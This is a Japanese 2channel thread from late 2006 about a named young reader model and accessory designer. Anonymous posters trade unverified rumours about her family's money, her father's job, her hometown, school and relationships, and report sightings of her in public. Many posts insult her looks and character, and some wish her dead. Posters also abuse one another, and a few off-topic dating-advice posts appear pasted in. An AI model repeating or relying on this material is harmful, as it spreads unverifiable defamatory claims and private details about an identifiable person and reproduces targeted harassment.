さおりちゃんのこういうとこは確かにシホっぽいw

仲いいんだっけ?

149 :無名モデル:2006/11/13(月) 01:03:25 ID:aVAnrObU
この子の家ど田舎やし、家も狭いし、貧乏やで!!!地元ではかなりの嫌われ者。村上沙織のイトコの方が金持ちやで。

150 :無名モデル:2006/11/13(月) 01:20:32 ID:aVAnrObU
ちなみにクローンの父がアパレル系の重役です。沙織の父は公務員です。

151 :無名モデル:2006/11/13(月) 01:26:33 ID:???
沙織の家は本当に美原町にあります。そしてクローンの家は沙織の家のご近所にあります。クローンの父はアパレル系で沙織の父は公務員と聞きました。

152 :無名モデル:2006/11/13(月) 01:47:37 ID:5D9VvMK0
クローンって?

153 :無名モデル:2006/11/13(月) 02:34:49 ID:???
沙織父ってもう定年してなかった?

卒業したら東京に引っ越すらしいね。

154 :無名モデル:2006/11/13(月) 15:02:17 ID:???
クローンは沙織のいとこ

155 :無名モデル:2006/11/13(月) 19:40:11 ID:???
こいつ小学校の時からいじめられっ子。そのくせ、目立ちたがりやで先生に媚びを売るなどで嫌われていて本当に救いようがない子やで。

156 :無名モデル:2006/11/13(月) 21:38:30 ID:???
なんで貧乏がケリーやバーキン持ってるの?
PFとか着てるし。



157 :無名モデル:2006/11/13(月) 22:06:10 ID:???
沙織ママが昔ローンでブランド物買いまくってるって沙織の地元の友達から聞いたことある。本当かどうかしらないけど

158 :無名モデル:2006/11/13(月) 22:38:24 ID:???
家が貧乏か金持ちかそんなんどーでもいいやん。もっと沙織チャンのことについて話そう。沙織チャンって童顔だよね。またそこがかわいらしい!

159 :無名モデル:2006/11/14(火) 06:33:32 ID:???
>>153
私も甲南の子にそれ聞いたわ。
アクセを本格的にやるのと、沙織ちゃんが『人生のパートナー』言うて信頼してる人が
東京にいるんでしょ?(彼ではなくて女性らしいね)
今後、その人と会社本格的に立ち上げたいらしいね。
どんな人なんやろね。

160 :無名モデル:2006/11/14(火) 07:05:47 ID:PsTj71bT
>>155
いじめられっこがしゃしゃったら何がいけないのか書いてみて。

お前の器の小ささ見たるよ

161 :無名モデル:2006/11/14(火) 07:07:47 ID:zLLZMARv
メニューならオーナーが考えればいいじゃん。
店名は何になるの?

162 :無名モデル:2006/11/14(火) 07:13:31 ID:???
しほって吉川しほ?

一緒にしたったらさおりちゃん可哀想…
さおりちゃんは可愛いしまだ若いからこれからでしょ。
吉川しほがたまに沙織ちゃん意識してるような気はする。でもブログランキングも沙織ちゃん一位キープしてるし、しほは論外じゃない?

163 :無名モデル:2006/11/14(火) 07:14:55 ID:zLLZMARv
可愛がってください!!☆

164 :無名モデル:2006/11/14(火) 09:45:48 ID:???
そういやたまに沙織東京に行ったりしてるもんね。東京行きは本当かも。

165 :無名モデル:2006/11/14(火) 19:33:39 ID:zLLZMARv
セレブなの?☆

166 :無名モデル:2006/11/14(火) 21:13:09 ID:???
この子が乗ってる車は全部国産のものだよ。ブログで写ってる車は沙織のイトコの親の車。だから沙織が金持ちじゃなくて、沙織の親戚がセレブだと思うよ。

167 :無名モデル:2006/11/14(火) 22:36:52 ID:???
ざーんねん。

168 :無名モデル:2006/11/14(火) 23:32:21 ID:???
沙織の家の車は二台ともベンツです・・・・・。
そしてお父さんも定年していないし公務員でもありません。
不確かな情報を真実だと思いこんで書き込むのやめよーよ。
東京にも引っ越さないし、人生のパートナーなんて存在しないし、
吉川まあこさんの事を悪く書くのもやめましょう。

もっと楽しい事を話したほうがいいですね。

169 :無名モデル:2006/11/15(水) 00:00:46 ID:???
沙織と同じ中学やったし、沙織の家近所やし、事実を書いてるだけ。信じるか信じないかはあなたの勝手だけど

170 :無名モデル:2006/11/15(水) 00:06:45 ID:???
ご家族のことをとやかく言うのは確かにどうかと思うけど
沙織ちゃんに信頼できる友人がいたり、卒業したら東京に引っ越すらしいねとか
そういう話のどこがいけないのかな?
少なくとも文章からも悪い心象は受けないし、
沙織ちゃんに心から大切に思うパートナーがいていいなと思うし、
東京に引っ越す話も、将来のことをしっかり考えてるんだと思ったよ。

ただ「可愛い」「憧れる」って話すのだけが楽しい話かな?
悪口は嫌だけどここは所詮2ちゃんだし、読モやっている以上噂立つのは仕方ないと思う。

171 :無名モデル:2006/11/15(水) 00:10:31 ID:???
>>168は何を話したいわけ?

172 :無名モデル:2006/11/15(水) 00:15:36 ID:???
>>170
私もそうだと思う。読モやってる限り、妬まれることだってあるし。
2chなんだから事実じゃない事も書かれることだってある

173 :無名モデル:2006/11/15(水) 00:21:16 ID:???
>>170がいいこと言った!
東京に住むらしい話の何が悪いの?
お父様が定年している噂の何がいけないの?
(リストラされたとかの噂はどーかと思うけど噂は定年でしょ?)
さおりちゃんに人生のパートナー(親友?)がいることが、さおりちゃんの迷惑になるの?

174 :無名モデル:2006/11/15(水) 01:21:10 ID:???
>>168
自演・・・?
何が言いたいの?ここ2ちゃんだよ
むきになってバカみたい

175 :無名モデル:2006/11/15(水) 05:56:01 ID:K96nNjHO
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

176 :無名モデル:2006/11/15(水) 06:14:50 ID:???
今までロムってたけど、仮に>>168が自演ならがっかりだよ・・・
私は村上さんと同じ学部の同窓で、村上さんとは親しくないけど
村上さんは仲良しグループの他の人にも優しいし、村上さん好きだよ。
村上さんのグループのとある子とは親しくしてるけど
その子から、村上さんがアクセサリーを本格的に仕事にするために
東京に行くつもりらしいとか色々聞いて、応援してたのに。

177 :無名モデル:2006/11/15(水) 09:43:16 ID:???
あらら〜やっちゃったね…

178 :無名モデル:2006/11/15(水) 10:23:48 ID:???
>>168みたいなのが出現すると、比較的アンチが少なかったのに
このようにみんなしらけてアンチに・・・いい勉強になったねw
今をもって>>168が何をしたいのか不明だけど。

179 :無名モデル:2006/11/15(水) 10:39:47 ID:K96nNjHO
179 :ノーブランドさん :04/06/21 10:39
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

180 :無名モデル:2006/11/15(水) 12:31:35 ID:nheHbsRJ
>>171
ピンクノースリワンピに白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

181 :無名モデル:2006/11/15(水) 12:40:22 ID:K96nNjHO
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

182 :無名モデル:2006/11/15(水) 17:49:16 ID:???
168 :無名モデル :2006/11/14(火) 23:32:21 ID:???
沙織の家の車は二台ともベンツです・・・・・。
そしてお父さんも定年していないし公務員でもありません。
不確かな情報を真実だと思いこんで書き込むのやめよーよ。
東京にも引っ越さないし、人生のパートナーなんて存在しないし、
吉川まあこさんの事を悪く書くのもやめましょう。

もっと楽しい事を話したほうがいいですね。


183 :無名モデル:2006/11/15(水) 19:48:15 ID:???
村上沙織自演乙w

184 :無名モデル:2006/11/16(木) 01:44:56 ID:???
今日はロージー1周年らしい

185 :無名モデル:2006/11/16(木) 03:11:23 ID:???
>>168がなければ素直に祝えたのにね。
自演にせよ、友人にせよ、ほんとにあのレスはミスったね。
評判ガタ落ち。

186 :無名モデル:2006/11/16(木) 08:03:43 ID:???
沙織ちゃん、スファロフスキーて書いてるけどスワロフスキーの間違い???それともスファロでも正解??
アクセやってるんやからまさか間違わないよね?
でもかわいいから許す(笑)

187 ::2006/11/16(木) 15:13:51 ID:YWxEVc2R
http://www.e-omochabako.com/index.html
最近のロジーのアクセのパーツ。ここにいっぱい!! 

188 :無名モデル:2006/11/16(木) 19:58:34 ID:???
今日、渋谷にいたと思う。
かなり背高いよね?顔はブログのが可愛い。
友達と楽しそうにはしゃいでた。
友達が可愛かった。

189 :無名モデル:2006/11/16(木) 22:38:06 ID:Bo9Iqwze
>>187
GJ!
誰かさん並にぼったくってるねw

ttp://www.e-omochabako.com/parts/plastic/number/motif2.html#heart

190 :無名モデル:2006/11/16(木) 22:51:09 ID:???
あの書き込み以来、いい話題少ないね。

191 :無名モデル:2006/11/17(金) 02:47:54 ID:???
この人小〜高まで地元の公立だよね?
実物長身だよね!

192 :無名モデル:2006/11/17(金) 09:53:21 ID:???
読めば読むほど>>168は自演に思えてくる。

193 :無名モデル:2006/11/17(金) 17:20:46 ID:???
なんで>>168みたいなことしちゃったんだろうね…
株、大暴落。

194 :無名モデル:2006/11/18(土) 01:05:05 ID:???
自分に自信持ってるよねこの子
まぁそれなりに顔整ってるし長身でスタイルも良いけどセンスがイマイチ・・・

195 :無名モデル:2006/11/18(土) 01:18:03 ID:???
父親公務員で定年してんだ。遅く生まれた子供なんだね。地味なグループの中のリーダーって感じ。雰囲気的に。従妹のパパのコネがあってよかったね♪

196 :188:2006/11/18(土) 01:23:14 ID:???
昨日、渋谷で見たの本物っぽいね。
東京にいるみたいだし。
実物は、特にオーラもなければ華やかでもなかった。
すっごい普通。顔も体型も。
ブログみてなかったら(毒モだけしてたら)わからなくてスルーしてたとオモ。
前にも書いたけどブログの方が可愛いから、写メマジックかもね。

色白自慢みたいだけど、一緒にいた女の子の方が綺麗だったし色白だったw
ただ、デカくてびっくりした。

197 :無名モデル:2006/11/18(土) 01:32:30 ID:???
>>194
ついでに、「沙織の家はは貧乏だから」と一瞬謙遜ぶるわりに
過剰なまでのお嬢様育ち自慢と、モテ自慢がすごいので学校では有名。

「沙織なんて…」が口癖なわりにかなりのナルシストで、
見掛けるといつも鏡見て髪いじってる。

育ちよいアピールしたいなら、自分のことは『私』って呼んだ方がいいよ、沙織ちゃんw

198 :無名モデル:2006/11/18(土) 01:34:38 ID:???
>>169 さおりこの家か親戚の家のどっちか、ピアノ教室じゃなかった?

199 :無名モデル:2006/11/18(土) 01:38:48 ID:FukR64pQ
毎日鏡見てどの角度で自分が1番可愛く見えるか研究してるっぽいよね
毎回ブログに顔アップ載せるの大好きみたいだし
とびきりオシャレでもないしフツーのレベルなのにね

200 :無名モデル:2006/11/18(土) 01:43:44 ID:???
>>196
アリガトン!
本物、やっぱオーラないんだー何だか納得

201 :無名モデル:2006/11/18(土) 01:49:58 ID:???
とりあえずニットワンピ着てればいいと思ってそう>ファッション
それにしてもお育ちのよい良家のお嬢さんが、男と旅行行きまくるかねぇ・・・
男受けしそうだからモテるだろうけど、自慢するのに激しく萎え。
更に地味グループの勘違いリーダー(必須アイテムはグラサン)はタチ悪杉(プゲラ

202 :無名モデル:2006/11/18(土) 01:58:31 ID:???
>>198
それは沙織のママだと思う。沙織本人から聞いたことある。

203 :無名モデル:2006/11/18(土) 02:03:10 ID:???
>>202
そっか、さおりこの家か。
友達が、さおりこの近隣が地元で、通ってたピアノの先生が村上って言ってたから
もしやと思って。でもさおりこのことは知らないってさ。

204 :無名モデル:2006/11/18(土) 10:47:11 ID:???
ブログのコメントで「最近まあこちゃんと仲わるいんですか」って聞いてた奴いた…
絶対10代やわ。いくら顔みえへんたってよく聞くなぁ。
沙織ちゃんも自分のブログで「はい、仲わるいです。嫌いです」とは返事せえへんやろ。
聞いたやつ頭わるっ…

205 :無名モデル:2006/11/18(土) 11:30:52 ID:???
ついでに沙織は「まあこさんは尊敬する先輩なので、みなさんが思ってるような事はありません。」って答えてた。
まあこのこと「さん」づけしてたよ。
やっぱりまあこに、はみられてるのが見え見えだw

206 :無名モデル:2006/11/18(土) 11:59:54 ID:???
この人、バスの中で大声で電話してるのを見たことがある。なのに自分で育ちのいい子って自慢するのはおかしいと思う!!!育ちよかったら普通そんなことしないよ。

207 :無名モデル:2006/11/19(日) 00:51:14 ID:???
さおりちゃんをよくご存知の方に質問です。
エルメスのバッグをたくさんブログで見るけど、他は何を持ってるんですか?
ミーハー質問ですみませんが・・

208 :無名モデル:2006/11/19(日) 05:16:52 ID:???
>>207
シャネル、クーバ、ブルガ、ヴィトンは見たことある。

身元バレしたくないから詳しく書きたくてもできないが
この子、みんなが思ってる以上にあざといよ。
損得感情で人と付き合うし、平気で嘘つくし。
でも、偽善ぶったり被害者面するのがうまい。

209 :無名モデル:2006/11/19(日) 18:42:26 ID:???
見かけによらず、性格悪いよ。気に入った子しか話さないし。しかもよくHOOP行くくせに、ブログで沙織をHOOPで見たというコメントの返事で『それ、沙織だったのかな?』と知らないフリをする。
ほんま性格悪すぎ!!!

210 :無名モデル:2006/11/19(日) 20:18:09 ID:???
沙織って、自分より明かに可愛い友達と遊んだ時はブログに写真載せない。
載せるのは、自分のステータスとなる毒モや業界人と遊んだ時か
自分を姫扱いしてくれる、自分より格下の大学の仲良しグループのみw
前にとある人のブログに沙織と遊んだという写真がたくさん載っていて
沙織の方が明らかにブサで、同じ日に沙織は全くそのことに触れてなかった。
それ知って、自分大好きな性格悪子と実感した。

211 :無名モデル:2006/11/19(日) 20:22:40 ID:???
村上さん。
モテるらしいのはわかりましたから、
学校でありえないくらい大きな声で、自分のモテ話するのはやめてください。
ついでに「読者モデル」という言葉に過剰反応するのもやめてください。
端から見ていて、気の毒でたまりません。
お里が知れますよ。

212 :無名モデル:2006/11/19(日) 20:32:53 ID:???
>>210 kwsk

213 :無名モデル:2006/11/19(日) 21:53:36 ID:???
>>210
誰のブログ??
見たいから教えてください!

214 :無名モデル:2006/11/19(日) 22:04:43 ID:???
てか高校の時まで自分のこと『沙織』とか言ってへんかったしなぁ!!お前キモイねん。高校でも実は嫌われ者だったw

215 :無名モデル:2006/11/19(日) 23:52:54 ID:???
>208
あんまりふだんはエルメス持ってないんですか?

HOOPとか行くんだね???
行くのは構わないんだけど、あそこ何かいい店入ってたっけ?


216 :無名モデル:2006/11/20(月) 00:22:42 ID:???
あのケリーもおもっきりパチもんwwww

217 :無名モデル:2006/11/20(月) 00:28:43 ID:???
どこがおもいっきり?

218 :無名モデル:2006/11/20(月) 00:29:40 ID:???
何を言っても所詮『読モ』ってことだよね。
地味でも、自分に無駄に自信あって、自己顕示欲が強いっていう。
ブログでは『あんまブランドにこだわらない』とか言ってるけど
この人、一目でわかるブランド物が大好きだよ。
頑張って標準語使ってるけど、骨の髄まで関西人。
東京人にはなれないのに。

一概には言えないけど、本当に育ちがよくて普通の神経してたら、読モなんてやらないでしょ。
本人は『ロージーを広めるために嫌々やってる』言うてるけど
昔、読モだったカマカナちゃんみたいに、読モやめても本人が頑張れば夢叶うじゃん。
結局は、目立ってみんなにチヤホヤされたいだけの子だよ。
あんまりこの子にいいイメージ持たない方がいいよ。

219 :無名モデル:2006/11/20(月) 00:36:50 ID:???
>>214
つーか高校の時、地味で目立たなかったよね。
しかも、ジュディマリのユキでも意識してんの?みたいなカッコしてたし。
違う意味で浮いとったわ。
雑誌で見た時、同姓同名の別人かと思うて、みんなドン引きしたし。
あの小さな街をセレブ気取りでサングラスで顔隠して歩いてるらしいよ。

220 :無名モデル:2006/11/20(月) 00:42:43 ID:???
>>217
素人は寝ろ

221 :無名モデル:2006/11/20(月) 00:44:30 ID:???
むしろ昔から目立ちたがり屋やし、今ドクモやってることが嬉しいんちゃうん?それに最近ブログに出てくる人も数知れてるし、あんま友達おらんのちゃうん?ドクモやっても友達少ないとかまじ笑えるわww

222 :無名モデル:2006/11/20(月) 00:45:19 ID:???
>>215
学校にはほとんど持ってこない。多分ブログに写す時か撮影の時のみ。

>>218
禿げあがるほど同意。
よく毒モ辞めたい言ってるけど辞めたらいいのに。

223 :無名モデル:2006/11/20(月) 00:49:33 ID:???
地味でオーラないのに目立ちたがりって一番手に負えないね

224 :無名モデル:2006/11/20(月) 00:49:38 ID:???
沙織はいつでもグラサン着用!!!誰もお前なんか見てへんって!!
地元の友達には無視されるから自分から声かけてるらしいで。しかも聞いた話によると、就活は3日でやめたらしい。しかも理由は『就活は自分に合わなかったから』やって

225 :無名モデル:2006/11/20(月) 17:04:58 ID:???
何系なのかよく分からんくらいファッションセンスなし」

226 :無名モデル:2006/11/20(月) 18:52:31 ID:???
叩かれ出したね…
まぁ性格なんて付き合ってみなわからんし、ただみてる分にはかわいいから私は好きやけど。
性格悪かろうが直接関係ないし。

227 :無名モデル:2006/11/20(月) 18:55:45 ID:???
沙織ちゃん「自分の欲しいものは極力自分で買うようにしてる」ってコメントしてたけど、ホントに親からおこづかいとか貰ってないのかな?
ポンポン新しい洋服とかかばんとか靴とか着てる気がスルケド…自分で買ってる?知人さんしりませんか?

228 :無名モデル:2006/11/20(月) 19:10:53 ID:???
目見開き杉でキモス

229 :無名モデル:2006/11/20(月) 20:12:22 ID:???
ふつうにもらってるやろ。沙織の親、子供に甘すぎって有名みたいやし。

230 :無名モデル:2006/11/20(月) 20:35:24 ID:???
沙織の性格
計算高い、腹黒い、偽善者、目立ちたがり屋、嘘つき、友達いない、自分大好き、自信家など
何か吉川詩穂と被る
貧乏育ちって共通点もあるし

231 :無名モデル:2006/11/20(月) 20:38:36 ID:???
村上さんとおんなじ大学でよく見かけるけど、友達に『これ、ママに買ってもらったの』てよく言ってるの聞く。すんごい自慢したがりだと思う。

232 :無名モデル:2006/11/20(月) 21:16:46 ID:???
叩かれ出したというより、今まで叩かれるほどの知名度なか(ry

ほんま、学校で自慢話以外聞いたことないわ。
見た目によらず声でかいし。

233 :無名モデル:2006/11/20(月) 22:43:24 ID:t0YQ77aU
いや〜>>186の影響は大きいでしょ。

234 :無名モデル:2006/11/20(月) 23:29:48 ID:???
>168じゃないの?

235 :無名モデル:2006/11/21(火) 00:01:56 ID:???
この子身長168でしょ??
けっこう細いけど体重どれくらいかな???

236 :無名モデル:2006/11/21(火) 00:09:16 ID:???
痩せてるけど、あんまり痛々しい細さではないよ。
骨格が華奢じゃなく、しっかりしてるのかもしれない。
イメージは華奢な感じするだろうけど。
今ぐらいでちょうどいいスタイルと思うけど、いつも「沙織デブなの」って言ってる。
気にするほどじゃないけど、もしかしたら「そんなことないよ!細いよ!」って言われたいのかもねw
あと、意外と顔が大きい。これまた小さいイメージあるだろうけど。
(大きいというか、いたって普通で、決して他と比べて小さくはない)

237 :無名モデル:2006/11/21(火) 00:40:43 ID:???
こいつのアクセってなんか中途半端
全部安物に見えて買う気になれない
結局はベタなデザインばっかwもっと頭使えよ

238 :無名モデル:2006/11/21(火) 07:06:44 ID:???
この人のアクセあんまり欲しいと思わん。ようこんなんでやっていけてると思うわ。

239 :無名モデル:2006/11/21(火) 11:56:59 ID:???
案の定、叩かれ出した途端にブログ更新停止w
打たれ弱いっていうか、全然成長しないね。
ねらー丸出し。

240 :無名モデル:2006/11/21(火) 12:00:52 ID:jmw30t+K
でも昔よりは太った気がする…

241 :無名モデル:2006/11/21(火) 17:07:15 ID:???
沙織ちゃんかわいいやん♪もっと更新してほしい!!

242 :無名モデル:2006/11/21(火) 19:53:25 ID:???
全部沙織の手作りとか言ってるけど、実は作ってない件。
手作りだけど人にやらせてる。

243 :無名モデル:2006/11/22(水) 00:12:20 ID:???
ブログでたまにすっぴんですって言ってるケド化粧してんのバレバレ。自分撮りする暇あったらコメントの返事したら?沙織さん

244 :無名モデル:2006/11/22(水) 00:27:06 ID:???
ただのガキやんこいつ

245 :無名モデル:2006/11/22(水) 01:20:01 ID:???
自称メイク薄いらしいけど、本物はがっつりメイクだよね。
別に変ではないから、認めればいいのに・・・
あと、自称美肌らしいけど普通。特に色白でもないし。

246 :無名モデル:2006/11/22(水) 01:35:43 ID:PIY5A3U5
確かにブログでいつもすっぴんですみませんとかぬかしてる割に全然そう見えへん


247 :無名モデル:2006/11/22(水) 05:45:52 ID:???
ブログのコメントで、大学の仲良しの友達に
「これからも沙織のマネージャー頑張って」と返信してるのを見て
好きだったのに、一気に嫌いになった。
何様?沙織様??

248 :無名モデル:2006/11/22(水) 14:49:07 ID:???
ブログおもんない。牧野彩佳のブログみたいに、みんなコメント書いてないしw
忙しい忙しいって言うてるけど、あんまりそんな風に見えへん。

249 :無名モデル:2006/11/22(水) 20:57:32 ID:???
             ,!\          !    \   こういうスレマジでもういいから
         i  \         l      \,,..__
          ,i′  ,\___,,--―l       \::゙'冖ーi、、
        i     :;\::::::::::..l              `'‐、、
       /__,..;:r---―-、,..__.     ,;'il:;}          .;:::`L__
   ,.:f''""゙゙゙´          、 ̄ヽ,//           ...::::::l;;;:;;::::
  _/       ......  、   \//、            ::::::::リ;;:::::::::....
//       ......:;::::::::::::. ヽ、\ ゙ヽ  ヘ    ●      ....:::::::::i';;;;::::::::::::
;;/    ::::::::::::;;;;;ノ ̄\:: 〉 〉゙'、 `ヽ_ノ       ......:::::::.;;;:ノ:;;;:::::::::::::
/    ..::::、__;;ノ;;;`ヽ_/: / /⌒)メ、_ノ/         .....:::::;;;/;;;:::::;;:::::::::
     ..:::イ;;.ヽ::;;;;;;;;;(__ノ /'"..:::::::::::::/  ...............:::::::::::;;;,;ノ;;::::::::::::::::
     :::::::l;;;;;;;;;\;;;;;;;,.(__ノ;.;:.\:::::::::/::::::::::::::::::::::::::::;;;;;/;:::::::::::::::::
    ::::::::,!::;;;;;;;;;;:.`゙'-、、  ::: \_/::::::::::;;;___,.;-―''"::::::::::::::::::::::::
   ..::::::::::,!;;;;;:;;;;;:::;;;;;:::;;;;;;`゙ ̄'''冖''―--―'";;;;;;;;;:::::::::::::::::::::::::


250 :無名モデル:2006/11/22(水) 20:58:31 ID:???
↑おのれはすっこんどれチンカスが

251 :無名モデル:2006/11/23(木) 10:24:38 ID:???
ブサイク村上は死ね
てか毒モで村上って言ったらろくなんおらんww
村上豚子にしてもこいつにしても

252 :無名モデル:2006/11/23(木) 13:52:40 ID:wBMhZt2d
ちょっと!!

253 :無名モデル:2006/11/23(木) 15:08:49 ID:???
ブログ更新しまくりでキモイね
メンズブランドとのコラボそんなに嬉しいんかド素人が
しかもブログでのろけだす始末・・・

254 :無名モデル:2006/11/23(木) 19:02:28 ID:???
メンズブランドって、自分の彼氏のじゃんw

255 :無名モデル:2006/11/23(木) 19:57:54 ID:???
あれって村上の彼氏のブランドなん???!!
どーりで中途半端なもん売ってると思ったww

256 :無名モデル:2006/11/23(木) 21:22:21 ID:???
男であんなアクセつけてるやつひくw

257 :無名モデル:2006/11/24(金) 00:32:07 ID:???
始めてブログ見たけど、あんなかわいーの?
雑誌の写真はもっと貧相で華ないのに…
ブログの写真は自分チョイスだから
いいやつ選んでるのかな?

258 :無名モデル:2006/11/24(金) 01:58:05 ID:???
ナル顔女は早く死ね〜

259 :無名モデル:2006/11/24(金) 02:10:57 ID:k7TnBrRt
アクセいっつもダサいのばっか作ってるね
あんなの誰が買うの〜???

260 :無名モデル:2006/11/24(金) 03:00:59 ID:E4smR0EZ
彼氏がブレスみて
だっさ!って言ってたわー
そしてださいくせに高いねー
ありえない

261 :無名モデル:2006/11/24(金) 13:50:48 ID:ZX6SVZp3
いくらオソロといえレディースにしてはごつすぎ。
CHROME HEARTSやジャスティンとはまた何か違う。
値段はいっちょまえ。

262 :無名モデル:2006/11/24(金) 15:11:34 ID:???
大体、あのメンズブランドってそんなに有名なの?

しかも、もっと内容の濃いブログをミクでやってます!とかさ、
あのブログの読者に失礼すぎない?
ヤプログの方は、どーでもいい内容ばっかだし
最近はノロケみたいな内容か、洋服紹介ばっかで鼻につくし。
善人面して、人を全然思いやれない人なんだね。
嫌いじゃなかったから、ガッカリだよ。

263 :無名モデル:2006/11/24(金) 15:16:02 ID:???
>>257
多くの目撃談にあるように、取り立てて特徴のない子。
地味でオーラとかはなし、ひがみなしに顔も標準レベルで決して目立たない。
学内や繁華街行けば、もっと可愛い子いっぱいいるよ。
ブログは、まさに写メマジックだね。

264 :無名モデル:2006/11/24(金) 15:53:13 ID:???
↑貴様はひっこんどれ。チンカス野郎が!

265 :無名モデル:2006/11/24(金) 19:39:45 ID:???
いまなんてほとんどみんなミクシやってるからいいんちゃうん?
どっちのブログもネタかぶるよりは嬉しいわ。

266 :無名モデル:2006/11/25(土) 00:29:25 ID:???
おばさんの顔はブログで出すのにママの顔は出さないんだね。普通は反対だと思うけどw

267 :無名モデル:2006/11/25(土) 07:09:32 ID:???
↑おのれはすっこんどれ、チンカスが

268 :吐きそう:2006/11/25(土) 09:42:46 ID:???
次元が低すぎる・・・。
嫉みでしょ・・・。
叩いてる人達 鏡見てから こんなに発言して良いか考えたら??
ブサイクなんじゃないの?とは言わないけど
こんな暇あったら もう少し中身を磨かないと・・・。
人間性は人相に出るからね。
チンカスって・・・・誰が下品で低レベルって見たら分かるよね。
まぁ なに言っても分からないんでしょうけど。

269 :無名モデル:2006/11/25(土) 11:00:03 ID:???
>>268
そーいうお前が1番性格ブスだよww
きっとお顔も醜いんどろーねwwwwww

270 :無名モデル:2006/11/25(土) 11:18:05 ID:???
↑おのれはすっこんどれ、チンカスが

271 :無名モデル:2006/11/25(土) 12:48:27 ID:???
○○カスとか、マルチだよ

272 :無名モデル:2006/11/26(日) 11:14:51 ID:???
ついにこの子もトークショーとかするようになっちゃったんだねぇ

273 :無名モデル:2006/11/26(日) 13:55:57 ID:???
LUXUメンバーだしね〜

274 :無名モデル:2006/11/26(日) 17:18:07 ID:???
>>273
正式メンバーなの?
一時的なコラボだけかと思ってた。

沙織は中島彩に憧れてんだか、世話になってんだか知らないが
「彩ちゃん大好き!」とか「信用できる読モ、彩ちゃんだけ」とか
一時は彩の画像を待ち受けにしてて、こわかった。

275 :無名モデル:2006/11/26(日) 22:31:35 ID:???

この話が本当なら村上さんは本当に痛い女だね…

276 :無名モデル:2006/11/29(水) 00:19:06 ID:???
ホントにフツーってかんじよねこの子
華がないし歩いてても誰も気付かない印象薄い子wwww
だからアクセも中途半端商品ばっかww

277 :無名モデル:2006/11/30(木) 21:03:50 ID:R7Le25Um
すぐ錆びて潰れるアクセばっか作ってんなよ

278 :無名モデル:2006/11/30(木) 21:39:03 ID:???
またブログにアップばっか写してるw
ナルシストもいいとこww
だいたい中島豚彩と布施のVIVREでトークショーしたみたいやけど、布施って時点ですたれてるし
そんなしょーもない仕事しかこないかっ

279 :無名モデル:2006/12/02(土) 14:54:12 ID:???
ブログ更新せーへんのやったら辞めろ!!

280 :無名モデル:2006/12/03(日) 02:07:15 ID:???
沙織ちゃんにはブログを更新できない理由があるんです。
理由もしらないのに、適当なことを言わないでください。
沙織ちゃんはいい加減な気持ちでアクセにも取り組んでません。
みんなが思ってるより業界の人に認められてるし、勉強しています。
読モ仲間とも仲良しだし、ライターさんからも信頼されてるみたいです。

281 :無名モデル:2006/12/03(日) 02:22:59 ID:za4ZK31r
えっとー…何言ってんの?
理由があるならあるできちんと本人が(できない状態ならば代理で誰かが)
ブログ上で短くてもいいから伝えるのが常識ある人間のすることでしょう。
自分の店の商品を載せるということは、
ただのお遊びのブログではありませんよね。
今回のことで、村上さんがどのように仕事を行っているか、
またブログを楽しみにして下さっているお客様への姿勢が伺えました。

282 :無名モデル:2006/12/03(日) 18:17:18 ID:???
>>280
本人乙。

283 :無名モデル:2006/12/03(日) 21:18:04 ID:Zxr59BnQ
>>280
そーだったんだ。
落ち着いたらまた更新してね。


なんて思うとでも?

284 :無名モデル:2006/12/03(日) 21:45:57 ID:???
更新できない理由がある って、やけにもったいつけるんだね。
ただの体調不良とかではないってことを言ってるんだよね?

ミクシのほうは友達が代理で更新してるはずだけど、そっちも更新ないね

285 :無名モデル:2006/12/03(日) 23:58:34 ID:???
>>280
>>168さん、こんばんは。

286 :無名モデル:2006/12/05(火) 00:37:34 ID:???
>>280
テラワロスwwwwwwwwwwwwwwwwwwwwwwwwwwwww
>沙織ちゃんはいい加減な気持ちでアクセにも取り組んでません。

>みんなが思ってるより業界の人に認められてるし、勉強しています。

>読モ仲間とも仲良しだし、ライターさんからも信頼されてるみたいです。

業界で認められてる??!!
こんな糞ブランド誰も知らねぇしライターから信用ってどのライターだよ
いい加減な事ばっか言ってんなボケ!!
お前知り合いやったらあのブサイクナル女にブログ辞めろって言っとけ!!!




287 :無名モデル:2006/12/05(火) 18:31:41 ID:???
>>286
まぁまぁ、本人の言うことですからw

288 :無名モデル:2006/12/05(火) 19:05:52 ID:IeFP7/m5
mixiしてるの?

289 :無名モデル:2006/12/06(水) 00:43:38 ID:???
結局、自分の誕生日とかの都合いい時にしかブログ更新しないんだね。
所詮ブログは自己満足の世界だと、個人的には思ってるけど
この人は『公式ブログ』みたいなこと銘打ってやってんだから、最低。
せめて、なんで更新できなかったのかをファン?に言うべきだよね。
更新自体も、自信過剰なファッション紹介や自分撮りばっか。
いかに、人に『可愛い』『憧れてます』と持ち上げられたいだけかわかったよ。
コメントも自演くさいけど。

290 :無名モデル:2006/12/06(水) 11:00:18 ID:???
チェックが厳しいこと

291 :無名モデル:2006/12/06(水) 23:09:10 ID:???
この人のブログなーんかムカつく。コメントもありきたりばっかりやし…。そんなに村上さんみたいな格好したい人とかいるん?って思う。

292 :無名モデル:2006/12/07(木) 00:07:14 ID:???
私は沙織ちゃんかわいいなって思います。
あたし自身顔薄いっていうのもあるので
少なくとも整形じゃないし。
ここさいしょあんなにほめ系だったのに、
なんか見てて、うーんてなります。前ほめてたひともアンチになったんですか?

293 :無名モデル:2006/12/07(木) 00:52:02 ID:wPSptzzF
>>292
スレ全部読んだ?

294 :無名モデル:2006/12/07(木) 01:25:03 ID:???
>>291
わかるわ〜
コメントの内容のほとんどが『どこで買いましたか?いくらですか?』なんだから
最初から『今日の服は●●でいくらです』って書けばいいのに。
商品の説明も中途半端だし、blogで何したいんだかね。

295 :無名モデル:2006/12/07(木) 01:29:26 ID:???
